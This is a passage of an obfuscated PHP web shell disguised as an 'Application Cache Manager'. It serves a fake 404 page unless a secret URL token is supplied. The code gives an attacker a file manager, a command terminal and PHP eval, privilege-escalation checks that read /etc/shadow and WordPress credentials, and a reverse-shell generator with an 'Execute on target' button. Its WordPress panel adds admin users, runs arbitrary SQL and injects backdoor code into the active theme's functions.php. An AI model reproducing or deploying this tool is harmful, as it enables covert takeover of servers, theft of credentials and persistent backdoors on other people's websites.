if(is_dir($pdir)){$d2=scandir($pdir);foreach($d2 as $n){if($n==='.'||$n==='..') continue;if(is_dir($pdir.'/'.$n))$all[]=array('name'=>$n,'active'=>in_array($n.'/'.$n.'.php',$active)||in_array($n.'.php',$active));}}
$r=array('ok'=>true,'plugins'=>$all,'active_raw'=>array_map('myebmqjhujs',$active));
}elseif($sub==='actplg'||$sub==='deactplg'){
$wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;}
$plg=isset($req['plg'])?$req['plg']:'';if(!$plg){$r=array('ok'=>false,'e'=>'no plugin');$wc['con']->close();break;}
$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='active_plugins' LIMIT 1");
$row=$res?$res->fetch_row():null;$list=array();if($row)preg_match_all('/s:\d+:"([^"]+\.php)"/',$row[0],$m);$list=isset($m[1])?$m[1]:array();
if($sub==='actplg'&&!in_array($plg,$list))$list[]=$plg;
elseif($sub==='deactplg')$list=array_values(array_filter($list,function($x)use($plg){return $x!==$plg;}));
$ser='a:'.count($list).':{';foreach($list as $i2=>$v2)$ser.='i:'.$i2.';s:'.strlen($v2).':"'.$v2.'";';$ser.='}';
$es=$wc['con']->real_escape_string($ser);
@$wc['con']->query("UPDATE {$px}options SET option_value='$es' WHERE option_name='active_plugins'");
$wc['con']->close();$r=array('ok'=>true,'count'=>count($list));
}elseif($sub==='themes'){
$wc=_wpconn($root);$cur='';
if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='stylesheet' LIMIT 1");if($res){$row=$res->fetch_row();$cur=$row?$row[0]:'';}$wc['con']->close();}
$tdir=$root.'/wp-content/themes';$themes=array();
if(is_dir($tdir)){$d2=scandir($tdir);foreach($d2 as $n){if($n==='.'||$n==='..') continue;if(is_dir($tdir.'/'.$n))$themes[]=array('name'=>$n,'active'=>($n===$cur));}}
$r=array('ok'=>true,'themes'=>$themes,'current'=>myebmqjhujs($cur));
}elseif($sub==='opts'){
$wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;}
$px=$wc['prefix'];$keys2=isset($req['keys'])?array_map('trim',explode(',',preg_replace('/[^a-z0-9_,]/i','',$req['keys']))):array('siteurl','home','blogname','admin_email','users_can_register','default_role','blogpublic','active_plugins');
$out=array();foreach($keys2 as $k){if(!$k)continue;$ek=$wc['con']->real_escape_string($k);$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='$ek' LIMIT 1");if($res){$row=$res->fetch_row();$out[$k]=$row?substr($row[0],0,200):'(empty)';}}
$wc['con']->close();$r=array('ok'=>true,'opts'=>$out);
}elseif($sub==='setopt'){
$wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;}
$key2=preg_replace('/[^a-z0-9_]/i','',isset($req['key'])?$req['key']:'');$val=isset($req['val'])?$req['val']:'';
if(!$key2){$r=array('ok'=>false,'e'=>'key required');$wc['con']->close();break;}
$px=$wc['prefix'];$ek=$wc['con']->real_escape_string($key2);$ev=$wc['con']->real_escape_string($val);
$res=@$wc['con']->query("UPDATE {$px}options SET option_value='$ev' WHERE option_name='$ek'");
if($wc['con']->affected_rows===0)@$wc['con']->query("INSERT INTO {$px}options (option_name,option_value,autoload) VALUES ('$ek','$ev','yes')");
$wc['con']->close();$r=array('ok'=>true);
}elseif($sub==='recent'){
$days=intval(isset($req['days'])?$req['days']:3);
$out=kdl78wc9wg5xi('find '.escapeshellarg($root).' -name "*.php" -mtime -'.$days.' -not -path "*/wp-includes/*" -not -path "*/wp-admin/includes/*" 2>/dev/null | sort -r | head -100');
$r=array('ok'=>true,'out'=>myebmqjhujs($out));
}elseif($sub==='uploads'){
$out=kdl78wc9wg5xi('find '.escapeshellarg($root.'/wp-content/uploads').' \( -name "*.php" -o -name "*.php7" -o -name "*.phtml" -o -name "*.phar" \) 2>/dev/null');
$r=array('ok'=>true,'out'=>myebmqjhujs($out?$out:'No PHP files found in uploads (good!)'));
}elseif($sub==='backdoor'){
$wc=_wpconn($root);$theme='';
if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='stylesheet' LIMIT 1");if($res){$row=$res->fetch_row();$theme=$row?$row[0]:'';}$wc['con']->close();}
if(!$theme)$theme='twentytwentyfour';
$fp=$root.'/wp-content/themes/'.$theme.'/functions.php';
$code=isset($req['code'])?agsol27cr3kj9($req['code']):'';
if(!$code){$r=array('ok'=>false,'e'=>'No code provided');break;}
$cur=qfr0nax8d($fp);if($cur===false){$r=array('ok'=>false,'e'=>'Cannot read: '.$fp);break;}
$tag="\n/* pxcache-".md5($code)." */\n".$code."\n";
if(strpos($cur,$code)!==false){$r=array('ok'=>false,'e'=>'Code already injected');break;}
$r=array('ok'=>h8z995wb4k($fp,$cur.$tag),'file'=>myebmqjhujs($fp),'theme'=>myebmqjhujs($theme));
}elseif($sub==='scan'){
$out="=== WORDPRESS SECURITY SCAN ===\n\n";
$vf=@file_get_contents($root.'/wp-includes/version.php');$ver='?';
if($vf&&preg_match('/\$wp_version\s*=\s*[\'"](.+?)[\'"]/',$vf,$m))$ver=$m[1];
$out.="[*] Path: $root\n[*] Version: $ver\n\n";
$cfg=@file_get_contents($root.'/wp-config.php');
if($cfg){
$out.='[*] WP_DEBUG: '.(strpos($cfg,'WP_DEBUG')!==false?'set':'not set')."\n";
$out.='[*] DISALLOW_FILE_EDIT: '.(strpos($cfg,'DISALLOW_FILE_EDIT')!==false?'set (safe)':'NOT set (risk)')."\n";
$out.='[*] FORCE_SSL_ADMIN: '.(strpos($cfg,'FORCE_SSL_ADMIN')!==false?'set':'not set')."\n\n";
}
$exposed=array('wp-config.php.bak','wp-config.bak','wp-config.php~','.git/config','readme.html','license.txt','wp-content/debug.log','wp-content/uploads/error_log');
$found=array();foreach($exposed as $f){if(@is_readable($root.'/'.$f))$found[]=$f;}
$out.='[EXPOSED FILES]'."\n".($found?implode("\n",$found):'none found')."\n\n";
$upphp=kdl78wc9wg5xi('find '.escapeshellarg($root.'/wp-content/uploads').' -name "*.php" 2>/dev/null | wc -l');
$out.='[PHP IN UPLOADS]: '.trim($upphp)." files\n\n";
$out.='[XMLRPC]: '.(is_file($root.'/xmlrpc.php')?'PRESENT (attack surface)':'not found')."\n";
$out.='[REST API file]: '.(is_file($root.'/wp-json/index.php')||is_dir($root.'/wp-json')?'wp-json/ exists':'standard WP REST')."\n\n";
$recent=kdl78wc9wg5xi('find '.escapeshellarg($root).' -name "*.php" -mtime -7 -not -path "*/wp-includes/*" -not -path "*/wp-admin/includes/*" 2>/dev/null | head -20');
$out.="[RECENTLY MODIFIED PHP (7d)]:\n".($recent?:' none')."\n";
$r=array('ok'=>true,'out'=>myebmqjhujs($out));
}
break;
}
}
echo $je($r);exit;
}
// ── GET: verify URL token ──────────────────────────────────────────────────
$_ptk=isset($_GET['my1'])?$_GET['my1']:'';
if(!z0sixtxnw($_ptk)){
define('WAK6FF',true);
while(@ob_get_level())@ob_end_clean();
if(!headers_sent()){@header('HTTP/1.1 404 Not Found');}
die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body style="font-family:sans-serif;padding:40px;color:#333"><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52</address></body></html>');
}
define('WAK6FF',true);
?><!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0">
<title>Application Cache Manager</title>
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">
<link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet">
<style>
:root{--bg:#050505;--neon:#00ff64;--c2:#00d4ff;--bd:rgba(255,255,255,0.06);--tx:#c8c8c8;--rd:#ff4d4d;--p:rgba(255,255,255,.015)}
*{box-sizing:border-box;margin:0;padding:0}html,body{height:100%;overflow:hidden}
body{background:var(--bg);color:var(--tx);font-family:'JetBrains Mono',monospace;background-image:radial-gradient(ellipse at 50% 0%,#111 0%,#000 100%)}
.app{height:100vh;display:flex;flex-direction:column}
#bar{height:2px;background:var(--neon);width:0;transition:width .15s;box-shadow:0 0 6px var(--neon);flex-shrink:0}
.hd{padding:9px 18px;border-bottom:1px solid var(--bd);display:flex;align-items:center;gap:14px;background:rgba(0,0,0,.65);flex-shrink:0}
.logo{font-weight:700;font-size:13px;color:#fff;letter-spacing:2px}.logo span{color:var(--neon)}
.tabs{display:flex;gap:3px;flex:1}.tab{padding:4px 12px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#444;transition:.15s;user-select:none}
.tab:hover{color:#999}.tab.on{color:var(--neon);border-color:rgba(0,255,100,.25);background:rgba(0,255,100,.03)}
.hdr{font-size:10px;color:#333;cursor:pointer;transition:.15s}.hdr:hover{color:var(--rd)}
.hdinfo{font-size:9px;color:#252525;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;max-width:200px}
.panels{flex:1;overflow:hidden;display:flex;flex-direction:column}
.panel{display:none;flex:1;flex-direction:column;overflow:hidden;min-height:0}.panel.on{display:flex}
/* FILE MANAGER */
.fnav{padding:7px 18px;background:rgba(0,0,0,.4);border-bottom:1px solid var(--bd);display:flex;gap:5px;align-items:center;flex-shrink:0;flex-wrap:wrap}
.bc{flex:1;font-size:11px;color:#383838;overflow:hidden;white-space:nowrap;min-width:0}
.bc span{cursor:pointer;transition:.15s}.bc span:hover{color:#fff}.bc .sep{margin:0 3px;color:var(--neon)}
.fg{flex:1;overflow-y:auto;min-height:0}
table{width:100%;border-collapse:collapse;font-size:11px}
th{text-align:left;padding:9px 18px;color:#303030;background:rgba(255,255,255,.01);position:sticky;top:0;backdrop-filter:blur(4px);z-index:1}
td{padding:7px 18px;border-bottom:1px solid var(--bd)}tr:hover td{background:rgba(255,255,255,.015)}
.btn{background:var(--p);border:1px solid var(--bd);color:#666;padding:4px 9px;border-radius:3px;font:10px 'JetBrains Mono',monospace;cursor:pointer;transition:.15s}
.btn:hover{border-color:var(--neon);color:var(--neon)}.btn.warn:hover{border-color:var(--rd);color:var(--rd)}
.badge{padding:1px 4px;border-radius:2px;background:rgba(255,255,255,.03);font-size:10px}.ico{width:16px;text-align:center;display:inline-block;margin-right:5px}
/* SHELL */
.trm{flex:1;display:flex;flex-direction:column;padding:13px;min-height:0}
.to{flex:1;background:#060606;border:1px solid var(--bd);padding:11px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;font-size:11px;color:#00dd55;border-radius:3px 3px 0 0;min-height:0}
.ti{display:flex;border:1px solid var(--bd);border-top:none;background:#080808;border-radius:0 0 3px 3px;flex-shrink:0}
.tp{padding:7px 9px;color:var(--neon);font-size:11px;white-space:nowrap;flex-shrink:0}
.tc{flex:1;background:none;border:none;color:#00dd55;font:11px 'JetBrains Mono',monospace;outline:none;padding:7px 0}
/* PHP */
.pp{flex:1;display:flex;padding:13px;gap:10px;min-height:0}
.pl,.pr{flex:1;display:flex;flex-direction:column;gap:6px;min-width:0}
textarea.ce{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;outline:none;resize:none;border-radius:3px}
.ob{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;border-radius:3px;min-height:0}
.lbl{font-size:10px;color:#303030}
/* INFO */
.ip{flex:1;overflow-y:auto;padding:16px}.ig{display:grid;grid-template-columns:repeat(auto-fill,minmax(260px,1fr));gap:9px}
.cd{background:var(--p);border:1px solid var(--bd);border-radius:4px;padding:12px}
.cd h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px}
.kv{display:flex;gap:7px;margin-bottom:4px;font-size:10px}.kv .k{color:#383838;min-width:75px;flex-shrink:0}.kv .v{color:#aaa;word-break:break-all}
/* TOOLS */
.tp2{flex:1;overflow:hidden;display:flex;flex-direction:column;min-height:0}
.stabs{padding:7px 18px;background:rgba(0,0,0,.3);border-bottom:1px solid var(--bd);display:flex;gap:4px;flex-wrap:wrap;flex-shrink:0}
.stab{padding:3px 10px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#383838;transition:.15s;user-select:none}
.stab:hover{color:#888}.stab.on{color:var(--c2);border-color:rgba(0,212,255,.25);background:rgba(0,212,255,.03)}
.spanel{display:none;flex:1;overflow-y:auto;padding:14px;gap:9px;flex-wrap:wrap;align-content:flex-start}
.spanel.on{display:flex}
.tc2{background:var(--p);border:1px solid var(--bd);border-radius:4px;padding:12px;width:100%;max-width:600px}
.tc2.full{max-width:100%}
.tc2 h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px}
.tco{background:#040404;border:1px solid var(--bd);padding:8px;font-size:10px;color:#00bb44;white-space:pre-wrap;word-break:break-all;max-height:220px;overflow-y:auto;border-radius:2px;margin-top:7px}
input.fi,select.fi,textarea.fi{background:#060606;border:1px solid var(--bd);color:#ccc;font:10px 'JetBrains Mono',monospace;padding:5px 7px;border-radius:2px;outline:none;width:100%;margin-bottom:5px}
input.fi:focus,select.fi:focus,textarea.fi:focus{border-color:var(--c2)}.fbr{display:flex;gap:4px;flex-wrap:wrap;margin-bottom:7px}
/* WP MODULE */
.wptab{padding:3px 10px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#444;transition:.15s;user-select:none;white-space:nowrap}
.wptab:hover{color:#aaa}.wptab.on{color:var(--c2);border-color:rgba(0,212,255,.25);background:rgba(0,212,255,.04)}
.wpsub{display:none}.wpsub.on{display:block}
/* OVERLAYS */
.ov{display:none;position:fixed;inset:0;background:rgba(0,0,0,.9);z-index:100;align-items:center;justify-content:center;backdrop-filter:blur(5px)}.ov.on{display:flex}
.mo{background:#0c0c0c;border:1px solid var(--bd);border-radius:6px;padding:20px;width:90%;max-width:730px}
.mo h3{color:#fff;margin-bottom:12px;font-size:12px}.mor{display:flex;justify-content:space-between;align-items:center;margin-bottom:11px}
</style></head>
<body>
<div class="app">
<div id="bar"></div>
<div class="hd">
<div class="logo">PX<span>5</span></div>
<div class="tabs">
<div class="tab on" onclick="switchTab(this,'files')"><i class="fa fa-folder-open fa-xs"></i> FILES</div>
<div class="tab" onclick="switchTab(this,'term')"><i class="fa fa-terminal fa-xs"></i> SHELL</div>
<div class="tab" onclick="switchTab(this,'php')"><i class="fa fa-code fa-xs"></i> PHP</div>
<div class="tab" onclick="switchTab(this,'info')"><i class="fa fa-server fa-xs"></i> INFO</div>
<div class="tab" onclick="switchTab(this,'tools')"><i class="fa fa-wrench fa-xs"></i> TOOLS</div>
</div>
<div class="hdinfo" id="hdinfo"></div>
<div class="hdr" onclick="window.close()" title="Close"><i class="fa fa-times"></i></div>
</div>
<div class="panels">
<!-- FILES -->
<div class="panel on" id="p-files">
<div class="fnav">
<div class="bc" id="bc"></div>
<button class="btn" onclick="mkDir()"><i class="fa fa-folder-plus"></i></button>
<button class="btn" onclick="newFile()"><i class="fa fa-file-plus"></i> New</button>
<button class="btn" onclick="showOv('upOv')"><i class="fa fa-upload"></i> Up</button>
<button class="btn" onclick="ls()"><i class="fa fa-sync-alt"></i></button>
</div>
<div class="fg">
<table>
<thead><tr>
<th style="color:var(--neon)">ENTITY</th>
<th>SIZE</th><th>MTIME</th><th>MODE</th>
<th style="text-align:right">ACTIONS</th>
</tr></thead>
<tbody id="tb"></tbody>
</table>
</div>
</div>
<!-- SHELL -->
<div class="panel" id="p-term">
<div class="trm">
<div class="to" id="to"></div>
<div class="ti">
<div class="tp" id="tp">$ </div>
<input class="tc" id="tc" placeholder="command..." onkeydown="termKd(event)" autocomplete="off">
</div>
</div>
</div>
<!-- PHP -->
<div class="panel" id="p-php">
<div class="pp">
<div class="pl">
<div class="lbl">PHP CODE <span style="color:#222">// eval in cwd</span></div>
<textarea class="ce" id="phpcode" placeholder="echo phpinfo(); var_dump(getcwd()); phpinfo(); "></textarea>
<div style="display:flex;gap:6px;justify-content:flex-end;flex-shrink:0">
<button class="btn" onclick="clrPHP()">Clear</button>
<button class="btn" style="border-color:rgba(0,255,100,.3);color:var(--neon)" onclick="runPHP()"><i class="fa fa-play"></i> Run</button>
</div>
</div>
<div class="pr">
<div class="lbl">OUTPUT</div>
<div class="ob" id="phpout"></div>
</div>
</div>
</div>
<!-- INFO -->
<div class="panel" id="p-info">
<div class="ip" id="infoC"><div style="color:#222;text-align:center;padding:50px;font-size:11px">Loading...</div></div>
</div>
<!-- TOOLS -->
<div class="panel" id="p-tools">
<div class="tp2">
<div class="stabs">
<div class="stab on" onclick="stab(this,'net')">Network</div>
<div class="stab" onclick="stab(this,'pe')">Priv Esc</div>
<div class="stab" onclick="stab(this,'rs')">Rev Shell</div>
<div class="stab" onclick="stab(this,'proc')">Processes</div>
<div class="stab" onclick="stab(this,'enc')">Encode/Hash</div>
<div class="stab" onclick="stab(this,'srch')">Search</div>
<div class="stab" onclick="stab(this,'arc')">Archive</div>
<div class="stab" onclick="stab(this,'wp')">WordPress</div>
<div class="stab" onclick="stab(this,'logs')">Logs</div>
</div>
<!-- NETWORK -->
<div class="spanel on" id="st-net">
<div class="tc2">
<h3><i class="fa fa-network-wired"></i> NETWORK</h3>
<div class="fbr">
<button class="btn" onclick="net('iface')">Interfaces</button>
<button class="btn" onclick="net('ports')">Open Ports</button>
</div>
<input class="fi" id="nH" value="8.8.8.8" placeholder="host / URL">
<input class="fi" id="nP" value="80,443,22,21,3306,8080" placeholder="ports for scan">
<div class="fbr">
<button class="btn" onclick="net('ping')">Ping</button>
<button class="btn" onclick="net('curl')">cURL</button>
<button class="btn" onclick="net('scan')">Port Scan</button>
</div>
<div class="tco" id="netOut"></div>
</div>
</div>
<!-- PRIV ESC -->
<div class="spanel" id="st-pe">
<div class="tc2 full">
<h3><i class="fa fa-user-secret"></i> PRIV ESC</h3>
<div class="fbr">
<button class="btn" style="border-color:rgba(0,212,255,.3);color:var(--c2)" onclick="pe('scan')">Quick Scan</button>
<button class="btn" onclick="pe('suid')">SUID</button>
<button class="btn" onclick="pe('sudo')">Sudo</button>
<button class="btn" onclick="pe('cap')">Caps</button>
<button class="btn" onclick="pe('cron')">Cron</button>
<button class="btn" onclick="pe('env')">Env</button>
<button class="btn" onclick="pe('writable')">Writable</button>
<button class="btn" onclick="pe('passwd')">/etc/passwd</button>
<button class="btn" onclick="pe('shadow')">/etc/shadow</button>
<button class="btn" onclick="pe('wpass')">WP Creds</button>
</div>
<div class="tco" style="max-height:350px" id="peOut"></div>
</div>
</div>
<!-- REV SHELL -->
<div class="spanel" id="st-rs">
<div class="tc2">
<h3><i class="fa fa-plug"></i> REVERSE SHELL</h3>
<input class="fi" id="rsIp" placeholder="Your IP (attacker)">
<input class="fi" id="rsPort" value="4444" placeholder="Port">
<select class="fi" id="rsType">
<option value="bash">Bash</option>
<option value="python">Python3</option>
<option value="perl">Perl</option>
<option value="nc">Netcat (mkfifo)</option>
<option value="nc2">Netcat (-e)</option>
<option value="php">PHP</option>
<option value="ruby">Ruby</option>
<option value="socat">Socat</option>
</select>
<div class="fbr">
<button class="btn" onclick="genRS(false)">Generate</button>
<button class="btn" style="border-color:#ff8c00;color:#ff8c00" onclick="genRS(true)">Execute on target</button>
</div>
<div class="tco" id="rsOut"></div>
</div>
</div>
<!-- PROCESSES -->
<div class="spanel" id="st-proc">
<div class="tc2 full">
<h3><i class="fa fa-microchip"></i> PROCESSES</h3>
<div class="fbr">
<button class="btn" onclick="runPs()"><i class="fa fa-sync-alt"></i> Refresh</button>
<input class="fi" id="psFilter" placeholder="filter..." oninput="filterPs()" style="width:180px;margin-bottom:0">
</div>
<div class="tco" style="max-height:380px;font-size:10px" id="psOut"></div>
</div>
</div>
<!-- ENCODE/HASH -->
<div class="spanel" id="st-enc">
<div class="tc2 full">
<h3><i class="fa fa-random"></i> ENCODE / HASH</h3>
<div style="display:flex;gap:6px;margin-bottom:7px;flex-wrap:wrap">
<select class="fi" id="encMode" style="width:auto;margin-bottom:0">
<option value="b64e">Base64 Encode</option>
<option value="b64d">Base64 Decode</option>
<option value="hexe">Hex Encode</option>
<option value="hexd">Hex Decode</option>
<option value="urle">URL Encode</option>
<option value="urld">URL Decode</option>
<option value="htmle">HTML Encode</option>
<option value="htmld">HTML Decode</option>
<option value="rot13">ROT13</option>
<option value="revs">Reverse</option>
<option value="md5">MD5 Hash</option>
<option value="sha1">SHA1 Hash</option>
<option value="phps">PHP Serialize</option>
<option value="phpd">PHP Unserialize</option>
</select>
<button class="btn" onclick="runEnc()"><i class="fa fa-arrow-right"></i> Convert</button>
<button class="btn" onclick="swapEnc()"><i class="fa fa-exchange-alt"></i> Swap</button>
</div>
<div style="display:flex;gap:8px">
<div style="flex:1;display:flex;flex-direction:column;gap:5px">
<div class="lbl">INPUT</div>
<textarea class="fi" id="encIn" rows="6" style="resize:vertical;height:120px"></textarea>
</div>
<div style="flex:1;display:flex;flex-direction:column;gap:5px">
<div class="lbl">OUTPUT</div>
<textarea class="fi" id="encOut" rows="6" style="resize:vertical;height:120px;color:var(--neon)" readonly></textarea>
</div>
</div>
</div>
</div>
<!-- SEARCH -->
<div class="spanel" id="st-srch">
<div class="tc2 full">
<h3><i class="fa fa-search"></i> SEARCH</h3>
<div style="display:flex;gap:6px;margin-bottom:7px;flex-wrap:wrap">
<input class="fi" id="srchPat" placeholder="pattern / filename" style="flex:1;margin-bottom:0">
<input class="fi" id="srchDir" placeholder="dir (default: cwd)" style="flex:1;margin-bottom:0">
</div>
<div class="fbr">
<button class="btn" onclick="runGrep(false)">Grep (content)</button>
<button class="btn" onclick="runGrep(true)">Grep -r (recursive)</button>
<button class="btn" onclick="runFind('f')">Find files</button>
<button class="btn" onclick="runFind('d')">Find dirs</button>
<button class="btn" onclick="runFind('')">Find all</button>
<label style="font-size:10px;color:#444;cursor:pointer"><input type="checkbox" id="srchCS"> Case-sensitive</label>
</div>
<div class="tco" style="max-height:320px" id="srchOut"></div>
</div>
</div>
<!-- ARCHIVE -->
<div class="spanel" id="st-arc">
<div class="tc2">
<h3><i class="fa fa-file-archive"></i> ARCHIVE (ZIP)</h3>
<input class="fi" id="arcName" placeholder="output name (e.g. arc.zip)" value="archive.zip">
<input class="fi" id="arcTarget" placeholder="target path (default: current dir)">
<div class="fbr">
<button class="btn" onclick="runArc('zip')">Create ZIP</button>
<button class="btn" onclick="runArc('tar')">Create TAR.GZ</button>
</div>
<input class="fi" id="arcFile" placeholder="archive file to extract">
<div class="fbr">
<button class="btn" onclick="runArc('unzip')">Unzip</button>
<button class="btn" onclick="runArc('untar')">Untar</button>
</div>
<div class="tco" id="arcOut"></div>
</div>
</div>
<!-- WORDPRESS -->
<div class="spanel" id="st-wp">
<div class="tc2 full" style="width:100%">
<!-- Root bar -->
<div style="display:flex;gap:8px;align-items:center;margin-bottom:10px;padding:8px 10px;background:rgba(0,212,255,.04);border:1px solid rgba(0,212,255,.12);border-radius:3px;flex-wrap:wrap">
<span style="font-size:10px;color:#444">WP Root:</span>
<span id="wpRootPath" style="font-size:10px;color:var(--c2);flex:1;min-width:150px">not detected</span>
<span id="wpVersion" style="font-size:10px;color:#444"></span>
<button class="btn" onclick="wpDetect()"><i class="fa fa-search"></i> Detect</button>
<button class="btn" onclick="wpS('scan')" style="border-color:rgba(255,100,0,.4);color:#ff8c00"><i class="fa fa-shield-alt"></i> Scan</button>
</div>
<!-- WP Sub-tabs -->
<div style="display:flex;gap:4px;flex-wrap:wrap;margin-bottom:10px;padding-bottom:8px;border-bottom:1px solid var(--bd)">
<div class="wptab on" onclick="wpTab(this,'wpi')">🔧 Info</div>
<div class="wptab" onclick="wpTab(this,'wpd')">📂 Database</div>
<div class="wptab" onclick="wpTab(this,'wpu')">👥 Users</div>
<div class="wptab" onclick="wpTab(this,'wpp')">🧩 Plugins</div>
<div class="wptab" onclick="wpTab(this,'wpt')">🎨 Themes</div>
<div class="wptab" onclick="wpTab(this,'wpf')">🗂 Files</div>
<div class="wptab" onclick="wpTab(this,'wpb')">💊 Backdoor</div>
</div>
<!-- INFO -->
<div class="wpsub on" id="wps-wpi">
<div style="display:flex;gap:8px;flex-wrap:wrap;margin-bottom:8px">
<button class="btn" onclick="wpGetInfo()"><i class="fa fa-info-circle"></i> System Info</button>
<button class="btn" onclick="wpS('creds')"><i class="fa fa-key"></i> DB Credentials</button>
<button class="btn" onclick="wpS('opts')"><i class="fa fa-cog"></i> WP Options</button>
</div>
<div style="display:flex;gap:6px;margin-bottom:6px;flex-wrap:wrap">
<input class="fi" id="wpOptKeys" placeholder="options (comma-sep, blank=defaults)" style="flex:1;margin-bottom:0">
<button class="btn" onclick="wpGetOpts()">Get Options</button>
</div>
<div style="display:flex;gap:6px;margin-bottom:6px;flex-wrap:wrap">
<input class="fi" id="wpOptKey" placeholder="option_name" style="flex:1;margin-bottom:0">
<input class="fi" id="wpOptVal" placeholder="new_value" style="flex:1;margin-bottom:0">
<button class="btn" onclick="wpSetOpt()" style="border-color:rgba(255,100,0,.4);color:#ff8c00">Set</button>
</div>
<div class="tco" id="wpiOut"></div>
</div>
<!-- DATABASE -->
<div class="wpsub" id="wps-wpd">
<div class="fbr">
<button class="btn" onclick="wpDbQ('SHOW TABLES')">Show Tables</button>
<button class="btn" onclick="wpDbQ('SELECT ID,user_login,user_email,user_pass FROM '+wpPfx()+'users')">Users Table</button>
<button class="btn" onclick="wpDbQ('SELECT option_name,option_value FROM '+wpPfx()+'options WHERE autoload=\\'yes\\' ORDER BY option_name')">Options</button>
<button class="btn" onclick="wpDbQ('SELECT * FROM '+wpPfx()+'posts WHERE post_status=\\'publish\\' LIMIT 10')">Posts</button>
</div>
<textarea class="fi" id="wpSql" rows="3" placeholder="SELECT * FROM wp_users LIMIT 10;" style="resize:vertical;font-size:11px"></textarea>
<div style="display:flex;gap:6px;margin-bottom:6px">
<button class="btn" onclick="wpRunSql()"><i class="fa fa-play"></i> Execute SQL</button>
<span id="wpDbCount" style="font-size:10px;color:#444;align-self:center"></span>
</div>
<div class="tco" style="max-height:280px;font-size:10px" id="wpdOut"></div>
</div>
<!-- USERS -->
<div class="wpsub" id="wps-wpu">
<div class="fbr">
<button class="btn" onclick="wpListUsers()"><i class="fa fa-list"></i> List Users</button>
</div>
<div id="wpUserList" style="font-size:10px;color:#555;margin-bottom:8px"></div>
<div style="background:rgba(0,255,100,.03);border:1px solid rgba(0,255,100,.1);padding:10px;border-radius:3px;margin-bottom:8px">
<div style="font-size:10px;color:var(--neon);margin-bottom:6px">➕ ADD ADMIN USER</div>
<div style="display:flex;gap:6px;flex-wrap:wrap">
<input class="fi" id="wpNewLogin" placeholder="username" style="flex:1;margin-bottom:0">
<input class="fi" id="wpNewPass" placeholder="password (blank=random)" style="flex:1;margin-bottom:0">
<input class="fi" id="wpNewEmail" placeholder="email (optional)" style="flex:1;margin-bottom:0">
<button class="btn" onclick="wpAddUser()" style="border-color:var(--neon);color:var(--neon)">Add Admin</button>
</div>
</div>
<div style="background:rgba(255,100,0,.03);border:1px solid rgba(255,100,0,.1);padding:10px;border-radius:3px">
<div style="font-size:10px;color:#ff8c00;margin-bottom:6px">🔒 CHANGE PASSWORD</div>
<div style="display:flex;gap:6px">
<input class="fi" id="wpChPwdLogin" placeholder="username" style="flex:1;margin-bottom:0">
<input class="fi" id="wpChPwdPass" placeholder="new password" style="flex:1;margin-bottom:0">
<button class="btn" onclick="wpChPwd()" style="border-color:#ff8c00;color:#ff8c00">Change</button>
</div>
</div>
<div class="tco" id="wpuOut" style="margin-top:8px"></div>
</div>
<!-- PLUGINS -->
<div class="wpsub" id="wps-wpp">
<button class="btn" onclick="wpListPlugins()" style="margin-bottom:8px"><i class="fa fa-list"></i> List Plugins</button>
<div id="wpPluginList" style="font-size:10px"></div>
<div class="tco" id="wppOut" style="margin-top:8px"></div>
</div>
<!-- THEMES -->
<div class="wpsub" id="wps-wpt">
<button class="btn" onclick="wpListThemes()" style="margin-bottom:8px"><i class="fa fa-list"></i> List Themes</button>
<div id="wpThemeList" style="font-size:10px"></div>
<div class="tco" id="wptOut" style="margin-top:8px"></div>
</div>
<!-- FILES -->
<div class="wpsub" id="wps-wpf">
<div class="fbr">
<button class="btn" onclick="wpS('uploads')"><i class="fa fa-exclamation-triangle" style="color:var(--rd)"></i> PHP in Uploads</button>
<button class="btn" onclick="wpRecentFiles(1)">Modified 1d</button>
<button class="btn" onclick="wpRecentFiles(3)">Modified 3d</button>
<button class="btn" onclick="wpRecentFiles(7)">Modified 7d</button>
</div>
<div class="tco" style="max-height:350px" id="wpfOut"></div>
</div>
<!-- BACKDOOR -->
<div class="wpsub" id="wps-wpb">
<div style="background:rgba(255,77,77,.04);border:1px solid rgba(255,77,77,.15);padding:12px;border-radius:3px;margin-bottom:8px">
<div style="font-size:10px;color:var(--rd);margin-bottom:6px">⚠ INJECT INTO ACTIVE THEME functions.php</div>
<div style="display:flex;gap:4px;flex-wrap:wrap;margin-bottom:8px">
<button class="btn" onclick="wpBdPreset('cmd')" style="font-size:9px" title="URL param: ?wp_debug=cmd&cmd=BASE64(whoami)">💻 CMD URL</button>
<button class="btn" onclick="wpBdPreset('post')" style="font-size:9px" title="POST param: curl -d 'c=BASE64(whoami)' URL">📩 POST Shell</button>
